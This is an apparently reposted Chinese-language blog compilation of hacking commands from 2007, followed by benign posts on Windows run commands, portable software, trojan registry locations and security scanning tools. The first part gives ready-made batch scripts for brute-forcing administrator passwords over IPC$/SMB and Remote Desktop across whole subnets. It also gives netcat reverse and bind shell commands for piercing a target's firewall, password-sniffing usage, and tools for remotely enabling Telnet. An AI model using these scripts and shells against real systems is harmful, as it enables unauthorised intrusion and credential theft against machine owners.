date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 駭客通常用它來編譯C語言寫的檔
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機(同win2K),當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器(同win2K)
附:批次處理命令與變數
1:for命令及變數 基本格式:
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數,如:%i ,而指定一個變數則用:%%i ,而調用變數時用:%i% ,變數是區分大小寫的(%i 不等於 %I)。
批次處理每次能處理的變數從%0—%9共10個,其中%0默認給批次檔案名使用,%1默認為使用此批次處理時輸入的的第一個值,同理:%2—%9指輸入的第2-9個值;例:net use \\ip\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3
(set):指定一個或一組檔,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ "(1 1 254)"第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即:從1到254;"(1 -1 254)"說明:即從254到1 }
command:指定對第個檔執行的命令,如:net use命令;如要執行多個命令時,命令這間加:& 來隔開
command_parameters:為特定命令指定參數或命令行開關
IN (set):指在(set)中取值;DO command :指執行command
參數:/L 指用增量形式{ (set)為增量形式時 };/F 指從文件中不斷取值,直到取完為止{ (set)為文件時,如(d:\pass.txt)時 }。
用法舉例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator find "命令成功完成" >>test.txt
存為test.bat 說明:對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接,如果成功就把該IP存在test.txt中。
/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批次處理默認的 %1;%%G 為變數(ip的最後一位);& 用來隔開echo 和net use 這二個命令; 指建立了ipc$後,在結果中用find查看是否有"命令成功完成"資訊;%1.%%G 為完整的IP地址;(1 1 254) 指起始值,增長量,結止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為:ok.exe 說明:輸入一個IP後,用字典檔d:\pass.dic來暴解d:\user.dic中的用戶密碼,直到檔中值取完為止。%%i為用戶名;%1為輸入的IP位址(默認)。
#7 七:
2:if命令及變數 基本格式:
IF [not] errorlevel 數字 命令語句 如果程式運行最後返回一個等於或大於指定數位的退出編碼,指定條件為"真"。
例:IF errorlevel 0 命令 指程式執行後返回的值為0時,就值行後面的命令;IF not errorlevel 1 命令指程式執行最後返回的值不等於1,就執行後面的命令。
0 指發現並成功執行(真);1 指沒有發現、沒執行(假)。
IF [not] 字串1==字串2 命令語句 如果指定的文本字串匹配(即:字串1 等於 字串2),就執行後面的命令。
例:"if "%2%"=="4" goto start"指:如果輸入的第二個變數為4時,執行後面的命令(注意:調用變數時就%變數名%並加" ")
IF [not] exist 檔案名 命令語句 如果指定的檔案名存在,就執行後面的命令。
例:"if not nc.exe goto end"指:如果沒有發現nc.exe文件就跳到":end"標籤處。

IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字串1==字串2 命令語句 else 命令語句或 IF [not] exist 檔案名 命令語句 else 命令語句 加上:else 命令語句後指:當前面的條件不成立時,就指行else後面的命令。注意:else 必須與 if 在同一行才有效。
當有del命令時需把del命令全部內容用< >括起來,因為del命令要單獨一行時才能執行,用上< >後就等於是單獨一行了;例如:"if exist test.txt. else echo test.txt.missing ",注意命令中的"."

(二)系統外部命令(均需下載相關工具):
1、瑞士軍刀:nc.exe
參數說明:
-h 查看幫助資訊
-d 後臺模式
-e prog程式重定向,一但連接就執行[危險]
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP位址,不能用功能變數名稱
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠端埠
-t 使用Telnet對話模式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送檔作用
type.exe c:\honeyport nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80埠,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送檔作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用:nc -d -l -p 本機埠 < 要傳送的檔路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放檔的路徑及名稱 傳送檔到對方主機
備 注:
管道命令
< 或 > 重定向命令。"<",例如:tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後臺執行);例:@dir c:\winnt >> d:\log.txt 意思是:後臺執行dir,並把結果存在d:\log.txt中
>與>>的區別  ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果,是因為第二次的結果把第一次的覆蓋了。
#8 八:
2、掃錨工具:xscan.exe
基本格式
xscan -host <起始IP>[-<終止IP>] <檢測專案> [其他選項] 掃錨"起始IP到終止IP"段的所有主機資訊
xscan -file <主機列表檔案名> <檢測專案> [其他選項] 掃錨"主機IP列表檔案名"中的所有主機資訊
檢測項目
-active 檢測主機是否存活
-os 檢測遠端作業系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其他選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有回應的主機
-o 跳過沒有檢測到開放埠的主機
  -t 併發線程數量,併發主機數量 指定最大併發線程數量和併發主機數量, 默認數量為100,10
-log 檔案名 指定掃描報告檔案名 (尾碼為:TXT或HTML格式的檔)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p  檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無回應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標準埠狀態,NT弱口令用戶,最大併發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測"hostlist.txt"檔中列出的所有主機的標準埠狀態,CGI漏洞,最大併發線程數量為200,同一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機
#9 九:
3、命令行方式嗅探器: xsniff.exe
可捕獲局域網內FTP/SMTP/POP3/HTTP協定密碼
參數說明
-tcp 輸出TCP資料報
-udp 輸出UDP資料報
-icmp 輸出ICMP資料報
-pass 過濾密碼資訊
-hide 後臺運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 檔案名 將輸出保存到檔
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後臺運行嗅探密碼並將密碼資訊保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp資訊並以ASCII格式輸出
4、終端服務密碼破解: tscrack.exe
參數說明
-h 顯示使用幫助
-v 顯示版本資訊
-s 在螢幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f後面的密碼
-F 間隔時間(頻率)
-l 使用-l後面的用戶名
-w 使用-w後面的密碼字典
-p 使用-p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠端用密碼字典檔暴破主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠端登陸192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存為3389.bat) (假設現有用SuperScan或其他掃錨器掃到一批開有3389的主機IP列表檔3389.txt)
3389.bat意思是:從3389.txt檔中取一個IP,接著運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存為hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)
hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的administrator密碼,並將破解結果保存在rouji.txt文件中。
5、其他:
Shutdown.exe
Shutdown \\IP地址 t:20 20秒後將對方NT自動關閉(Windows 2003系統自帶工具,在Windows2000下用進就得下載此工具才能用。在前面Windows 2003 DOS命令中有詳細介紹。)
fpipe.exe (TCP埠重定向工具) 在第二篇中有詳細說明(埠重定向繞過防火牆)
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 當有人掃錨你的80埠時,他掃到的結果會完全是www.sina.com.cn的主機資訊
Fpipe -l 23 -s 88 -r 23 目標IP 把本機向目標IP發送的23埠Telnet請求經埠重定向後,就通過88埠發送到目標IP的23埠。(與目標IP建立Telnet時本機就用的88埠與其相連接)然後:直接Telnet 127.0.0.1(本機IP)就連接到目標IP的23埠了。
OpenTelnet.exe (遠端開啟telnet工具)
opentelnet.exe \\IP 帳號 密碼 ntlm認證方式 Telnet埠 (不需要上傳ntlm.exe破壞微軟的身份驗證方式)直接遠端開啟對方的telnet服務後,就可用telnet \\ip 連接上對方。
NTLM認證方式:0:不使用NTLM身份驗證;1:先嘗試NTLM身份驗證,如果失敗,再使用用戶名和密碼;2:只使用NTLM身份驗證。
ResumeTelnet.exe (OpenTelnet附帶的另一個工具)
resumetelnet.exe \\IP 帳號 密碼 用Telnet連接完對方後,就用這個命令將對方的Telnet設置還原,並同時關閉Telnet服務。
#10 十:
6、FTP命令詳解:
FTP命令是Internet用戶使用最頻繁的命令之一,熟悉並靈活應用FTP的內部命令,可以大大方便使用者,並收到事半功倍之效。如果你想學習使用進行後臺FTP下載,那麼就必須學習FTP指令。
FTP的命令行格式為:
ftp -v -d -i -n -g [主機名] ,其中
-v 顯示遠端伺服器的所有回應資訊;
-n 限制ftp的自動登錄,即不使用;.n etrc文件;
-d 使用調試方式;
-g 取消全局檔案名。
FTP使用的內部命令如下(中括弧表示可選項):
1.![cmd[args]]:在本地機中執行交互shell,exit回到ftp環境,如:!ls*.zip
2.$ macro-ame[args]: 執行巨集定義macro-name。
3.account[password]: 提供登錄遠端系統成功後訪問系統資源所需的補充口令。
4.append local-file[remote-file]:將本地檔追加到遠端系統主機,若未指定遠端系統檔案名,則使用本地檔案名。
5.ascii:使用ascii類型傳輸方式。
6.bell:每個命令執行完畢後電腦響鈴一次。
7.bin:使用二進位檔傳輸方式。
8.bye:退出ftp會話過程。
9.case:在使用mget時,將遠端主機檔案名中的大寫轉為小寫字母。
10.cd remote-dir:進入遠端主機目錄。
11.cdup:進入遠端主機目錄的父目錄。
12.chmod mode file-name:將遠端主機檔file-name的存取方式設置為mode,如:chmod 777 a.out。
13.close:中斷與遠端伺服器的ftp會話(與open對應)。
14.cr:使用asscii方式傳輸檔時,將回車換行轉換為回行。
15.delete remote-file:刪除遠端主機檔。
16.debug[debug-value]:設置調試方式, 顯示發送至遠端主機的每條命令,如:deb up 3,若設為0,表示取消debug。
17.dir[remote-dir][local-file]:顯示遠端主機目錄,並將結果存入本地檔。
18.disconnection:同close。
19.form format:將檔傳輸方式設置為format,缺省為file方式。
20.get remote-file[local-file]: 將遠端主機的檔remote-file傳至本地硬碟的local-file。
21.glob:設置mdelete,mget,mput的檔案名擴展,缺省時不擴展檔案名,同命令行的-g參數。
22.hash:每傳輸1024位元組,顯示一個hash符號(#)。
23.help[cmd]:顯示ftp內部命令cmd的幫助資訊,如:help get。
24.idle[seconds]:將遠端伺服器的休眠計時器設為[seconds]秒。
25.image:設置二進位傳輸方式(同binary)。
26.lcd[dir]:將本地工作目錄切換至dir。
27.ls[remote-dir][local-file]:顯示遠端目錄remote-dir, 並存入本地檔local-file。
28.macdef macro-name:定義一個宏,遇到macdef下的空行時,巨集定義結束。
29.mdelete[remote-file]:刪除遠端主機檔。
30.mdir remote-files local-file:與dir類似,但可指定多個遠端檔,如 :mdir *.o.*.zipoutfile 。
31.mget remote-files:傳輸多個遠端檔。
32.mkdir dir-name:在遠端主機中建一目錄。
33.mls remote-file local-file:同nlist,但可指定多個檔案名。
34.mode[modename]:將檔傳輸方式設置為modename, 缺省為stream方式。
35.modtime file-name:顯示遠端主機檔的最後修改時間。
36.mput local-file:將多個檔傳輸至遠端主機。
37.newer file-name: 如果遠端機中file-name的修改時間比本地硬碟同名檔的時間更近,則重傳該檔。
38.nlist[remote-dir][local-file]:顯示遠端主機目錄的檔清單,並存入本地硬碟的local-file。
39.nmap[inpattern outpattern]:設置檔案名映射機制, 使得檔傳輸時,檔中的某些字元相互轉換, 如:nmap $1.$2.$3[$1,$2].[$2,$3],則傳輸文件a1.a2.a3時,檔案名變為a1,a2。 該命令特別適用于遠端主機為非UNIX機的情況。
40.ntrans[inchars[outchars]]:設置檔案名字元的翻譯機制,如ntrans1R,則檔案名LLL將變為RRR。
41.open host[port]:建立指定ftp伺服器連接,可指定連接埠。
42.passive:進入被動傳輸方式。
43.prompt:設置多個檔傳輸時的交互提示。
44.proxy ftp-cmd:在次要控制連接中,執行一條ftp命令, 該命令允許連接兩個ftp伺服器,以在兩個伺服器間傳輸檔。第一條ftp命令必須為open,以首先建立兩個伺服器間的連接。
45.put local-file[remote-file]:將本地檔local-file傳送至遠端主機。
46.pwd:顯示遠端主機的當前工作目錄。
47.quit:同bye,退出ftp會話。
48.quote arg1,arg2...:將參數逐字發至遠端ftp伺服器,如:quote syst.
49.recv remote-file[local-file]:同get。
50.reget remote-file[local-file]:類似於get, 但若local-file存在,則從上次傳輸中斷處續傳。
51.rhelp[cmd-name]:請求獲得遠端主機的幫助。
52.rstatus[file-name]:若未指定檔案名,則顯示遠端主機的狀態, 否則顯示檔狀態。
53.rename[from][to]:更改遠端主機檔案名。
54.reset:清除回答佇列。
55.restart marker:從指定的標誌marker處,重新開始get或put,如:restart 130。
56.rmdir dir-name:刪除遠端主機目錄。
57.runique:設置檔案名只一性存儲,若檔存在,則在原文件後加尾碼.1, .2等。
58.send local-file[remote-file]:同put。
59.sendport:設置PORT命令的使用。
60.site arg1,arg2...:將參數作為SITE命令逐字發送至遠端ftp主機。
61.size file-name:顯示遠端主機檔大小,如:site idle 7200。
62.status:顯示當前ftp狀態。
63.struct[struct-name]:將檔傳輸結構設置為struct-name, 缺省時使用stream結構。
64.sunique:將遠端主機檔案名存儲設置為只一(與runique對應)。
65.system:顯示遠端主機的作業系統類型。
66.tenex:將檔傳輸類型設置為TENEX機的所需的類型。
67.tick:設置傳輸時的位元組計數器。
68.trace:設置包跟蹤。
69.type[type-name]:設置檔傳輸類型為type-name,缺省為ascii,如:type binary,設置二進位傳輸方式。
70.umask[newmask]:將遠端伺服器的缺省umask設置為newmask,如:umask 3
71.user user-name[password][account]:向遠端主機表明自己的身份,需要口令時,必須輸入口令,如:user anonymous my@email
72.verbose:同命令行的-v參數,即設置詳盡報告方式,ftp 伺服器的所有響 應都將顯示給用戶,缺省為on.
73.?[cmd]:同help.
#11 十一:
7:電腦運行命令全集 winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程式
winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程式
wscript--------windows腳本宿主設置
write----------寫字板winmsd-----系統資訊
wiaacmgr-------掃描器和照相機嚮導
winchat--------XP自帶局域網聊天
mem.exe--------顯示記憶體使用情況
Msconfig.exe---系統配置實用程式
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠端桌面連接
mplayer2-------媒體播放機
magnify--------放大鏡實用程式
mmc------------打開控制臺
mobsync--------同步命令
dxdiag---------檢查DirectX資訊
drwtsn32------ 系統醫生
devmgmt.msc--- 設備管理器
dfrg.msc-------磁片碎片整理程式
diskmgmt.msc---磁片管理實用程式
dcomcnfg-------打開系統元件服務
ddeshare-------打開DDE共用設置
dvdplay--------DVD播放器
net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------打開記事本
nslookup-------網路管理的工具嚮導
ntbackup-------系統備份和還原
narrator-------螢幕"講述人"
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員操作請求
netstat -an----(TC)命令檢查介面
syncapp--------創建一個公事包
sysedit--------系統組態編輯程式
sigverif-------檔簽名驗證程式
sndrec32-------答錄機
shrpubw--------創建共用檔夾
secpol.msc-----本地安全策略
syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
services.msc---本地服務設置
Sndvol32-------音量控制程式
sfc.exe--------系統檔檢查器
sfc /scannow---windows檔保護
tsshutdn-------60秒倒計時關機命令
tourstart------xp簡介(安裝完成後出現的漫遊xp程式)
taskmgr--------任務管理器
eventvwr-------事件查看器
eudcedit-------造字程式
explorer-------打開資源管理器
packager-------物件包裝程式
perfmon.msc----電腦性能監測程式
progman--------程式管理器
regedit.exe----註冊表
rsop.msc-------組策略結果集
regedt32-------註冊表編輯器
rononce -p ----15秒關機
regsvr32 /u *.dll----停止dll檔運行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁片檢查
certmgr.msc----證書管理實用程式
calc-----------啟動計算器
charmap--------啟動字元對應表
cliconfg-------SQL SERVER 用戶端網路實用程式
Clipbrd--------剪貼板查看器
conf-----------啟動netmeeting
compmgmt.msc---電腦管理
cleanmgr-------**整理
ciadv.msc------索引服務程式
osk------------打開螢幕鍵盤
odbcad32-------ODBC資料源管理器
oobe/msoobe /a----檢查XP是否啟動
lusrmgr.msc----本機用戶和組
logoff---------註銷命令
iexpress-------木馬捆綁工具,系統自帶
Nslookup-------IP地址偵測器
fsmgmt.msc-----共用文件夾管理器
utilman--------輔助工具管理器
gpedit.msc-----組策略

2007年12月7日 星期五

轉載自--傳動網絡,打造專業的繁體站長站、教程網![www.jiaojiang.org]

使用C#開發一個簡單的P2P應用 http://www.jiaojiang.org/html/7/9/9301/1.htm

C#語言由於其對網路功能良好的支持,特別是內置地支持TCPListener和TCPClient這二個類,使得利用它開發P2P應用程序變得非常容易。下面就是一個使用C#開發的P2P應用的例子:......

--C#-簡單的掃Port程式

轉載自--記憶是苦難的開始 ---http://tw.myblog.yahoo.com/jw!v9EKjxOXCkSQzfYe5uE-/article?mid=36
C#-簡單的掃Port程式
一個很簡單的掃Port程式可以掃本機或者遠端主機支援IP或DomainIP和Domain的差別在於如果輸入的是Domain該Domain若含一個以上的ip也會被掃瞄下個版本計畫加入多線程下載位置http://mamba.zapto.org/project/scanport.rar

藍色小鋪的討論區列表文章>>c#

C#---> 一個 WMI 在 winxp sp2 下會發生的問題:
http://www.blueshop.com.tw/board/show.asp?subcde=BRD20051220004003QQ1&fumcde=FUM20050124192253INM

2007年8月23日 星期四

實用軟體介紹

無聊人的無聊小站 - 實用軟體介紹

著名可攜式軟體列表

http://zh.wikipedia.org/wiki/%E5%8F%AF%E6%94%9C%E5%BC%8F%E8%BB%9F%E9%AB%94

著名可攜式軟體列表
· 8start Launcher - 美化桌面工具
· Comicsviewer - 漫畫瀏覽工具
· ConvertZ - 中文內碼轉換工具,可進行繁簡互換
· Foxit PDF Reader - PDF的閱讀工具
· GreenBrowser - 網頁瀏覽工具
· HijackThis - 間諜軟體移除工具
· IrfanView - 圖檔管理工具
· Lingoes 靈格斯 - 桌面詞典翻譯軟體
· Media Player Classic - 媒體播放工具
· Miranda IM - 即時通訊工具
· MPlayer - 媒體播放工具
· Omziff - 加密或銷毀文件工具
· Pass2Go - 自動填表工具
· Portable Firefox - Mozilla Firefox網頁瀏覽工具的綠色化版本
· Portable Thunderbird - Mozilla Thunderbird郵件工具的綠色化版本
· ReSysInfo Information Viewer - 電腦系統資訊檢索工具
· SilentNight Micro Burner - 光碟燒錄工具
· Snippy - 擷圖工具
· Subpad - 記事本工具
· Trillian Anywhere - Trillian即時通訊軟體的綠色化版本
· XMPlay - 媒體播放工具
· Zip2Dir - 壓縮與解壓工具
· μTorrent - BT下載工具

自由、綠色、可攜式軟體

轉自 http://blogs.mcps.tp.edu.tw/post/3/86

自由軟體, 是一種可以不受限制地自由使用、複製、研究、修改和分發的軟體。自由軟體運動的創始人——里查·史托曼提供了以下的定義:『自由軟體的重點在於自由權,而 非價格。要了解其所代表的概念,你應該將「自由」想成是「自由演講」,而不是「免費啤酒」』。主要許可證有GPL許可證和BSD許可證兩種。根據斯托曼和自由軟體基金會(FSF)的定義,自由軟體賦予使用者四種自由:* 自由之零:不論目的為何,有使用該軟體的自由。* 自由之一:有研究該軟體如何運作的自由,並且得以改寫該軟體來符合使用者自身的需求。取得該軟體之源碼為達成此目的之前提。* 自由之二:有重新散佈該軟體的自由,所以每個人都可以藉由散佈自由軟體來敦親睦鄰。* 自由之三: * 有改善再利用該軟體的自由,並且可以發表改寫版供公眾使用,如此一來,整個社群都可以受惠。如前項,取得該軟體之源碼為達成此目的之前提。

綠色軟體(Greenware), 又稱綠色軟件,指一種免費軟體,一般在網路上以無條件的方式發放的小型軟體。優點是檔案比較細小﹑不用安裝﹑刪除方便和只佔用少量系統資源,所以甚至可以 放在Mp3播放器或USB記憶體中讀取。大部份綠色軟體更是開放源碼並不設權限歡迎任何人士參與修改或增加功能。

可攜式軟體(Portable application)指一類不須安裝、可以連同設定資料一併置於隨身碟等卸除式儲存裝置內轉移至不同電腦使用的應用軟體。由於設定是置於程式資料夾內 而非寫入登錄或其他位置,因此轉移到不同電腦後仍可正常執行;移除儲存裝置後也不會將資料留在本機電腦上。在中文內所稱的綠色軟體也屬於可攜式軟體的一類,特色是體積小、啟動快、不耗用系統資源,通常是單一執行檔。

2007年8月19日 星期日

把檔案轉成Flash

把檔案轉成Flash

SWF Tools官方網站http://www.quiss.org/swftools
SWF Tools下載網址http://www.quiss.org/swftools/download.html
Macromedia FlashPaper 2官方網站http://www.macromedia.com/software/flashpaper
Macromedia FlashPaper 2下載網址http://www.macromedia.com/cfusion/tdrc/index.cfm?product=flashpaper

2007年8月16日 星期四

木馬可能藏匿之註冊表清單

木馬可能藏匿之註冊表清單 1.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 2.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 4.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 5.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceSetup 6.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceSetup 7.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices 8.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices 9.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 10.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce 11.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 12.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 13.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit 14.HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\WinLogon
15. HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Explorer\Shell Folders
16. HKEY_CLASSES_ROOT\txtfile\shell\open\command
17. HKEY_CLASSES_ROOT\Briefcase\shell\open\command
18. HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\
19. HKEY_CLASSES_ROOT\exefile\shell\open\command
20. HKEY_CLASSES_ROOT\???file \shell\open\command (???)表示可能為任何副檔名之名稱

2007年8月15日 星期三

15款資安工具

轉貼http://blog.yam.com/myloveret/article/2082194

你想測試你的Widnows系統的安全性嗎?
如果你選對了工具,其實這是一件非常有趣的工作。如果你正為挑選合適的工具而苦惱,那就讓本文給你一些幫助吧。
  關於安全測試工具,我發現大體上你都能購買到。然而,還有一些是免費的工具,沒有這些工具我會舉步維艱,所以我將兩種類型的工具一同與你分享。   基於Widnows平臺的電腦,有7類常見的安全測試工具,它們是:   
1. 埠掃瞄 (Port scanners)   
2. 網路/作業系統弱點掃瞄 (Network/OS vulnerability scanners   
3. 應用程式/資料庫弱點掃瞄 (Application/database vulnerability scanners)   
4. 密碼破解 (Password crackers)   
5. 文件查找工具 (File searching tools)   
6. 網路分析 (Network analyzers)   
7. 漏洞檢查工具 免費 SuperScan version 3

www.foundstone.com/resources/proddesc/superscan3.htm 快速並且易用的埠掃瞄器,可以在運行的系統中尋找開放的埠和正在運行的服務,抓取banner資訊包括軟體的版本。

SoftPerfect Network Scanner http://www.softperfect.com/products/networkscanner 映射MAC位址到IP位址,可以幫你定位隨機的有線和無線的系統

NetBIOS Auditing Tool (NAT) http://www.cotse.com/tools/netbios.htm 靈巧的Windows網路共用密碼的破解工具

Winfingerprint http://winfingerprint.sourceforge.net Windows 資訊列舉工具,它可以搜索到補丁的等級資訊,NetBIOS資訊,用戶資訊等

Metasploit http://www.metasploit.org 一個強大的查找基於Windows平臺弱點的工具

Cain & Abel http://www.oxid.it 一個很不錯的混合密碼破解工具

商用 QualysGuard http://www.qualys.com 強大且易用且全面的網路/作業系統弱點掃瞄工具,適用於上千種新老漏洞。

GFI LANguard Network Security Scanner http://www.gfi.com/lannetscan 一套完美的定位於Windows系統,功能強大且價格低廉的的網路/作業系統弱點掃瞄工具

N-Stealth http://www.nstalker.com 一款物美價廉的針對運行IIS的系統掃瞄工具

WebInspect http://www.spidynamics.com/products/webinspect/index.html 徹底的挖掘基於IIS,Apach等系統的Web應用程式弱點

WinHex http://www.winhex.com/winhex/index-m.html 查找運行程式遺留於記憶體中的敏感資訊 -- 完全搜索類似於「密碼」,「SSN」,等等之類的文本資訊。以發現那些未清除乾淨的敏感資訊

AppDetective for MS SQL Server www.appsecinc.com/products/appdetective/mssql 全面的SQL Server 資料庫安全掃瞄工具

Proactive Password Auditor www.elcomsoft.com/ppa.html 一個效果明顯且簡單易用的用戶密碼破解工具 -- 支援Rainbow Table Effective File Search www.sowsoft.com/search.htm 強大的文本搜索工具,適用於搜索本地檔或伺服器上的共用檔。 -- 完全搜索類似於「密碼」,「SSN」,等等之類的文本資訊。 以發現那些未被保護的敏感資訊

EtherPeek http://www.wildpackets.com/products/etherpeek/overview 完美的網路分析器,可以找出不懷好意的系統,未被認可的協議, 找出上層的講話者, 以及更多

  當你裝備你的安裝測試工具箱時,你會發現沒有一款工具是最好的。也就是說那些安全檢測工具不是萬能的。應用程式、作業系統和網路知識和重要經驗才會是最重要的。 http://searchsecurity.techtarget.com.cn/tips/153/2391653.shtml?BLK=050001&NODE=1005

偵測篇-定期安檢企業的資訊系統

轉貼http://www.pcteacher.com.tw/modules/newbb/viewtopic.php?topic_id=1937&forum=66

偵測篇-定期安檢企業的資訊系統

找出系統漏洞,根據重要性與緊急程度,排定修補計畫 想要修補系統漏洞,先要找出現存漏洞的類型和數量,企業通常會委託資安廠商進行弱點掃描(Vulnerability Scanning)、網路安全評估(Network Security Assessment Services,NSAS)和滲透測試(Penetration Testing),在入侵或病毒蠕蟲事件發生前找出弱點,針對發現的漏洞修補,才能對症下藥。

使用這些服務有些原則是共通的,廠商需要了解企業網路架構中提供哪些網路服務及應用程式,確認掃描目標對象、應用程式及網路設備後,要選用適合的弱點評估工具,並依照約定的掃描政策,執行弱點掃描作業,之後分析結果產生報表,進行修補弱點與修正安全漏洞,以及後續複檢作業。

用對工具,找出弱點
